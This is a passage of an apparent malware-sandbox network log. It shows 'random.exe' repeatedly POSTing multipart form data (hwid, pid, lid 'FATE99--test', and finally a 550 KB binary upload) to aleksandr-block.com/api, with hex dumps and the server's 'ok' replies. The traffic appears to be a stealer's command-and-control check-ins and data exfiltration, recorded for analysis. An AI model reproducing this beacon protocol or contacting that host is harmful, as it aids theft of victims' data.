                                                  2025-01-14 08:53:06 UTC1369INData Raw: 53 48 48 72 62 62 54 6a 6b 63 73 4d 70 62 31 46 4a 4e 6a 74 61 6c 69 2f 4e 57 61 46 38 46 53 66 42 66 35 79 52 49 46 64 78 2b 4a 68 5a 4b 5a 49 6a 65 36 4a 30 32 6d 45 2f 45 57 6b 66 4c 55 75 74 49 73 6c 4c 35 32 68 59 4e 49 35 2f 6c 74 56 34 48 48 33 2b 6b 55 34 6e 6b 6d 73 78 36 33 50 47 4b 32 70 57 54 7a 6b 79 58 4a 73 69 7a 6c 65 6e 65 78 6b 71 78 6e 65 65 6c 53 38 63 4f 4c 61 5a 52 47 4c 44 49 78 58 70 5a 65 4d 76 62 45 4d 50 49 33 46 41 33 79 76 47 45 50 38 33 47 43 54 50 63 4a 53 5a 4b 46 68 6b 39 70 56 56 4c 5a 70 73 4e 65 46 79 79 43 6c 31 56 30 38 33 4e 31 36 58 4b 4d 52 43 70 6e 68 57 59 34 35 2f 67 74 56 34 48 45 66 67 6d 56 73 74 32 55 6f 79 2b 58 4c 49 49 6d 78 64 44 79 4e 78 51 4e 38 72 78 68 44 2f 4e 78 73 68 77 33 79 49 6d 53 42 63 66 2f
                                                  Data Ascii: SHHrbbTjkcsMpb1FJNjtali/NWaF8FSfBf5yRIFdx+JhZKZIje6J02mE/EWkfLUutIslL52hYNI5/ltV4HH3+kU4nkmsx63PGK2pWTzkyXJsizlenexkqxneelS8cOLaZRGLDIxXpZeMvbEMPI3FA3yvGEP83GCTPcJSZKFhk9pVVLZpsNeFyyCl1V083N16XKMRCpnhWY45/gtV4HEfgmVst2Uoy+XLIImxdDyNxQN8rxhD/Nxshw3yImSBcf/
                                                  2025-01-14 08:53:06 UTC1369INData Raw: 6c 57 59 30 37 6e 6e 46 4c 33 56 51 52 54 41 2b 58 70 67 6e 32 46 75 31 66 42 34 75 77 48 43 54 6c 53 35 63 64 2f 75 65 48 47 7a 62 5a 43 32 69 4b 34 49 45 52 45 5a 5a 4e 6e 31 36 69 44 72 41 56 36 74 68 48 53 7a 4e 62 70 65 46 59 42 49 32 35 35 6c 4e 59 73 4e 31 4a 66 56 30 33 57 39 2b 45 55 67 77 66 77 48 66 4a 38 56 65 71 6e 77 53 4a 4d 74 77 6d 5a 41 6c 56 6e 72 36 6e 31 51 72 6b 57 59 77 35 48 6e 42 4c 32 68 51 51 7a 67 32 56 35 5a 73 68 42 43 67 62 31 5a 31 6a 6b 36 4b 6b 6a 68 52 5a 72 53 73 58 7a 4f 4b 64 6a 6a 79 64 59 41 4f 5a 46 31 4d 4f 54 68 4a 33 7a 4f 45 53 65 64 77 47 6d 32 57 4f 4a 71 52 4c 46 39 78 2b 4a 46 52 4c 5a 78 6f 4f 75 68 39 30 43 35 69 57 55 4d 30 4d 6b 75 56 4a 74 68 5a 72 6e 6f 59 4a 64 78 37 32 74 74 67 57 32 36 32 78 68 77
                                                  Data Ascii: lWY07nnFL3VQRTA+Xpgn2Fu1fB4uwHCTlS5cd/ueHGzbZC2iK4IEREZZNn16iDrAV6thHSzNbpeFYBI255lNYsN1JfV03W9+EUgwfwHfJ8VeqnwSJMtwmZAlVnr6n1QrkWYw5HnBL2hQQzg2V5ZshBCgb1Z1jk6KkjhRZrSsXzOKdjjydYAOZF1MOThJ3zOESedwGm2WOJqRLF9x+JFRLZxoOuh90C5iWUM0MkuVJthZrnoYJdx72ttgW262xhw
                                                  2025-01-14 08:53:06 UTC1369INData Raw: 64 30 39 67 6a 6b 6e 43 51 38 4a 50 46 65 52 4b 39 78 42 36 6c 59 62 4a 73 4a 31 6c 5a 35 67 45 6a 62 77 33 67 52 79 31 53 4d 78 38 7a 4f 61 63 54 55 4b 47 6d 39 6f 43 63 30 7a 68 45 6e 6e 59 56 5a 31 6e 44 62 61 68 32 41 45 4e 72 47 64 54 6a 43 64 59 43 50 68 4e 50 77 66 52 45 5a 5a 4e 69 51 62 75 53 76 62 57 62 46 36 42 42 50 77 56 70 65 55 49 31 49 30 78 34 68 52 4d 70 68 6d 4d 74 78 4e 7a 43 5a 7a 56 6b 45 36 50 78 6e 52 62 4d 55 51 2f 30 35 57 5a 59 35 48 31 4e 55 34 48 43 36 32 71 31 38 73 6c 57 51 6a 38 7a 37 68 4e 6e 46 62 56 48 34 5a 58 6f 34 6c 33 46 32 31 4e 31 68 74 79 44 6a 43 78 57 34 63 63 75 66 65 42 48 4c 4a 4f 47 43 78 4a 4a 4a 7a 65 42 39 57 66 43 6b 5a 78 33 36 45 45 4c 55 33 54 6d 32 4a 65 34 69 48 4a 6c 39 67 39 64 6c 69 48 4c 74 6f
                                                  Data Ascii: d09gjknCQ8JPFeRK9xB6lYbJsJ1lZ5gEjbw3gRy1SMx8zOacTUKGm9oCc0zhEnnYVZ1nDbah2AENrGdTjCdYCPhNPwfREZZNiQbuSvbWbF6BBPwVpeUI1I0x4hRMphmMtxNzCZzVkE6PxnRbMUQ/05WZY5H1NU4HC62q18slWQj8z7hNnFbVH4ZXo4l3F21N1htyDjCxW4ccufeBHLJOGCxJJJzeB9WfCkZx36EELU3Tm2Je4iHJl9g9dliHLto
                                                  2025-01-14 08:53:06 UTC1369INData Raw: 4a 7a 50 41 51 63 61 32 38 4c 67 47 4c 54 45 4c 45 33 54 6e 2b 41 4f 49 6a 56 65 42 77 78 39 59 78 4f 4a 4a 68 31 4e 71 56 4e 2f 42 52 6b 58 30 45 37 4b 57 79 63 50 63 6c 51 72 45 6b 6f 44 4d 42 7a 6e 5a 6b 32 59 6b 6a 44 6e 56 49 73 6e 48 55 6b 6f 6a 32 43 4c 69 63 4a 64 6e 78 33 47 61 42 69 69 6b 6a 6e 4c 31 59 59 7a 58 61 55 6b 6a 5a 4e 4f 38 4f 64 54 53 47 62 61 48 57 73 4d 38 52 68 50 77 4d 42 66 44 74 49 33 33 53 61 41 76 77 69 52 58 71 65 4b 6f 58 62 4f 52 78 67 74 73 59 4f 62 4e 74 78 64 62 6f 7a 68 53 4a 31 51 30 6b 2f 4b 56 72 59 45 76 52 32 70 48 41 51 4c 73 42 76 69 39 63 50 58 33 33 36 6b 6c 73 30 70 56 30 67 34 58 33 4d 4a 6e 46 41 44 33 4a 2f 56 74 39 30 38 78 43 32 66 52 46 68 68 6a 53 4c 68 69 35 58 59 50 48 65 59 32 7a 62 65 33 57 36 4d
                                                  Data Ascii: JzPAQca28LgGLTELE3Tn+AOIjVeBwx9YxOJJh1NqVN/BRkX0E7KWycPclQrEkoDMBznZk2YkjDnVIsnHUkoj2CLicJdnx3GaBiikjnL1YYzXaUkjZNO8OdTSGbaHWsM8RhPwMBfDtI33SaAvwiRXqeKoXbORxgtsYObNtxdbozhSJ1Q0k/KVrYEvR2pHAQLsBvi9cPX336kls0pV0g4X3MJnFAD3J/Vt908xC2fRFhhjSLhi5XYPHeY2zbe3W6M


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.549710188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:07 UTC280OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=IST7RK1QCU7AP
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 12804
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:07 UTC12804OUTData Raw: 2d 2d 49 53 54 37 52 4b 31 51 43 55 37 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 37 39 38 33 35 31 39 35 39 30 31 42 38 44 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 49 53 54 37 52 4b 31 51 43 55 37 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 53 54 37 52 4b 31 51 43 55 37 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 49 53 54 37 52 4b 31 51 43 55 37 41
                                                  Data Ascii: --IST7RK1QCU7APContent-Disposition: form-data; name="hwid"9179835195901B8DB960CC18D99B375A--IST7RK1QCU7APContent-Disposition: form-data; name="pid"2--IST7RK1QCU7APContent-Disposition: form-data; name="lid"FATE99--test--IST7RK1QCU7A
                                                  2025-01-14 08:53:11 UTC1142INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=f2vspakck3plrb1gjimbhlunmj; expires=Sat, 10 May 2025 02:39:46 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9v%2BMRM8Qku%2FaN0j6qEYNUS%2BDO2%2FEl3PFhOdujGk7eKc%2F5X3gnEvE7t%2BlgU7VWuwQLlEsLxCVJh71IwVJdH%2B3VC45iyT9zlOPCdg6%2Bg%2Bf9X7eB9DEjIQ11WXIGSXVDkYu5vsqywbJ"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c64d1ac3a8c27-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1950&rtt_var=753&sent=14&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13742&delivery_rate=1432777&cwnd=243&unsent_bytes=0&cid=a0e15a70701d34fa&ts=3956&x=0"
                                                  2025-01-14 08:53:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                  Data Ascii: fok 8.46.123.189
                                                  2025-01-14 08:53:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.549715188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:11 UTC284OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=V1046GCCGL3JS7ZSI
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 15070
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:11 UTC15070OUTData Raw: 2d 2d 56 31 30 34 36 47 43 43 47 4c 33 4a 53 37 5a 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 37 39 38 33 35 31 39 35 39 30 31 42 38 44 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 56 31 30 34 36 47 43 43 47 4c 33 4a 53 37 5a 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 31 30 34 36 47 43 43 47 4c 33 4a 53 37 5a 53 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d
                                                  Data Ascii: --V1046GCCGL3JS7ZSIContent-Disposition: form-data; name="hwid"9179835195901B8DB960CC18D99B375A--V1046GCCGL3JS7ZSIContent-Disposition: form-data; name="pid"2--V1046GCCGL3JS7ZSIContent-Disposition: form-data; name="lid"FATE99--test--
                                                  2025-01-14 08:53:12 UTC1128INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=omann4anappr99p342f87hegf8; expires=Sat, 10 May 2025 02:39:51 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4a%2Fg7NKfBo0jOWArMG6sYZBYKsdUC9TdPAguTKrO0bqOoPc5OSn8Il0ev3X7HL7hpmjwCB0O88RnOQblqp8zVPRdXnpnRoybsGEo2XViCXwGxoeC7JmnL%2BXe4zOBzBjxs%2B75m7h"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c64eccc021879-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1513&rtt_var=569&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16012&delivery_rate=1918528&cwnd=162&unsent_bytes=0&cid=667d440eaa742b55&ts=656&x=0"
                                                  2025-01-14 08:53:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                  Data Ascii: fok 8.46.123.189
                                                  2025-01-14 08:53:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.549717188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:12 UTC279OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=WNTHL69SO9YK
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 20530
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:12 UTC15331OUTData Raw: 2d 2d 57 4e 54 48 4c 36 39 53 4f 39 59 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 37 39 38 33 35 31 39 35 39 30 31 42 38 44 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 57 4e 54 48 4c 36 39 53 4f 39 59 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 4e 54 48 4c 36 39 53 4f 39 59 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 57 4e 54 48 4c 36 39 53 4f 39 59 4b 0d 0a 43
                                                  Data Ascii: --WNTHL69SO9YKContent-Disposition: form-data; name="hwid"9179835195901B8DB960CC18D99B375A--WNTHL69SO9YKContent-Disposition: form-data; name="pid"3--WNTHL69SO9YKContent-Disposition: form-data; name="lid"FATE99--test--WNTHL69SO9YKC
                                                  2025-01-14 08:53:12 UTC5199OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: un 4F([:7s~X`nO`i
                                                  2025-01-14 08:53:13 UTC1129INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=fohaos6b5h1quocr58j62dfall; expires=Sat, 10 May 2025 02:39:52 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OY2d4E%2Bs5V1WKxdDTmtM7VZKoQz1c3YGrt31X1KEz95DTdvbWu1GFjp8VH55U0vKP5RxWpEUjA0wmkPpN85%2B2Fb8%2FFJgWRrN4TuzwvNZrclzIPLwFhmWiyFlolLwONry01P0iyn"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c64f44dac0cc2-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1614&rtt_var=629&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21489&delivery_rate=1708601&cwnd=176&unsent_bytes=0&cid=a7236b50cfaca3db&ts=676&x=0"
                                                  2025-01-14 08:53:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                  Data Ascii: fok 8.46.123.189
                                                  2025-01-14 08:53:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.549719188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:14 UTC284OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=DAAUDKHTANMXRT3WIW
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 1422
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:14 UTC1422OUTData Raw: 2d 2d 44 41 41 55 44 4b 48 54 41 4e 4d 58 52 54 33 57 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 37 39 38 33 35 31 39 35 39 30 31 42 38 44 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 44 41 41 55 44 4b 48 54 41 4e 4d 58 52 54 33 57 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 41 41 55 44 4b 48 54 41 4e 4d 58 52 54 33 57 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d
                                                  Data Ascii: --DAAUDKHTANMXRT3WIWContent-Disposition: form-data; name="hwid"9179835195901B8DB960CC18D99B375A--DAAUDKHTANMXRT3WIWContent-Disposition: form-data; name="pid"1--DAAUDKHTANMXRT3WIWContent-Disposition: form-data; name="lid"FATE99--test
                                                  2025-01-14 08:53:14 UTC1130INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:14 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=ni0qb54ig1qu1uehjq1cbr3q27; expires=Sat, 10 May 2025 02:39:53 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CN8C1GxogkBpLmT3KdwLaYMiAqzC6K596iIbdarufYjkfejbH645rXsCNhf9Kdd1uYtexk%2BHe7pqU%2Bz0fy%2FQYOpj%2FE8KiR2Is%2BGH4EZXNDJlXK8OLnZkmSShM4pFbQGs2cDf9Gn"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c64fbed5841d8-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1669&rtt_var=635&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2342&delivery_rate=1712609&cwnd=222&unsent_bytes=0&cid=feb0657c7b537af7&ts=464&x=0"
                                                  2025-01-14 08:53:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                  Data Ascii: fok 8.46.123.189
                                                  2025-01-14 08:53:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.549722188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:15 UTC281OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=W5X8IKKEPGIFL
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 550556
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: 2d 2d 57 35 58 38 49 4b 4b 45 50 47 49 46 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 37 39 38 33 35 31 39 35 39 30 31 42 38 44 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 57 35 58 38 49 4b 4b 45 50 47 49 46 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 35 58 38 49 4b 4b 45 50 47 49 46 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 57 35 58 38 49 4b 4b 45 50 47 49 46
                                                  Data Ascii: --W5X8IKKEPGIFLContent-Disposition: form-data; name="hwid"9179835195901B8DB960CC18D99B375A--W5X8IKKEPGIFLContent-Disposition: form-data; name="pid"1--W5X8IKKEPGIFLContent-Disposition: form-data; name="lid"FATE99--test--W5X8IKKEPGIF
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: 96 6a a3 a6 a5 e8 ef b8 73 7e 66 4f 14 e3 65 b7 7e c9 92 53 bc 65 6f ec 78 9a bf a5 d5 e3 71 df 57 60 51 47 32 a1 fb 87 30 ca c0 6c b4 8a 7f a1 48 6a 5c 56 a2 30 cd d2 05 ba 94 2a 19 b7 96 c9 a2 0c 89 5e aa 48 1c cf 88 20 59 9b b6 fb ca 56 3c aa 85 25 24 25 b7 33 94 23 61 a1 44 6f d6 ec f4 6e 41 b0 2c c4 48 a6 16 9d c6 05 da a3 a9 25 5b 9d 8e 4f 93 2b 3d 9e e3 61 2f a8 42 44 2a ed 13 44 8f 91 66 a5 47 41 a9 13 ce 0c 5d 3c 4b a4 f9 f2 41 a6 03 ec c8 5d 64 d7 29 a0 56 f9 01 7d 49 64 6b 27 1a 9e d3 6e 05 cc a2 90 4a 3e 14 a8 2f 3d 56 64 05 5b 6f 19 b9 0a d9 ad dd 93 6a 7a ce b4 bf fc de 15 ac 95 1f b1 79 a7 b5 b9 52 b1 6f 7d ce d5 fe ed e0 0b 5c 7f a9 b3 6b 81 80 83 db db 8d f5 e4 2c 9f c1 fd a7 64 4f 81 c4 24 ee 22 4e 00 04 a8 8a 0c 73 18 1f ee 20 80 be c2
                                                  Data Ascii: js~fOe~SeoxqW`QG20lHj\V0*^H YV<%$%3#aDonA,H%[O+=a/BD*DfGA]<KA]d)V}Idk'nJ>/=Vd[ojzyRo}\k,dO$"Ns
                                                  2025-01-14 08:53:15 UTC15331OUTData Raw: e4 19 f2 7f 1e 11 47 55 2b 34 24 1e 18 08 d4 c5 ab 4b ca 5d b0 ce 14 aa 0e 0f 3f 38 4e 6b 5c 37 4d c8 9c ef 62 33 0d 2b d4 be 19 5a cf bc 48 13 19 97 e5 be de 46 bc 65 a4 8b 3b 68 9b d0 7a e9 c1 6b 65 2f 52 2f e1 d0 48 bd 75 cd c9 ea d3 88 ec df b0 e8 aa f8 ab a9 ec 96 ff c6 80 2b 3d c5 21 60 b6 60 52 b3 cb ee 11 ef 5b 25 c7 f5 2e db c0 13 25 78 0e f8 0d 7c df fa 8b f7 f3 df ac b6 79 2e b3 7a d9 76 68 e3 c2 dd ce 8b 2e af 1d 79 4d 22 3f dc 82 dd 03 36 2a ed d7 2f e9 ba 73 e7 83 96 d4 db 7f fe a9 82 a6 ab 82 b4 50 46 a1 70 85 21 44 9d 78 f4 59 ff b9 21 77 6d a7 0c 67 09 b0 50 f8 b9 41 37 08 0c cd 22 98 cb e5 07 60 c4 5f 4d 35 b8 05 58 e9 df d4 ae 6b 83 5f a5 88 0a f0 02 cc cb bf ef 00 24 7f 05 74 0b 0b 23 02 e1 07 9a f1 50 9c 7e 0e 51 0a 00 1e 14 ed 46 01
                                                  Data Ascii: GU+4$K]?8Nk\7Mb3+ZHFe;hzke/R/Hu+=!``R[%.%x|y.zvh.yM"?6*/sPFp!DxY!wmgPA7"`_M5Xk_$t#P~QF
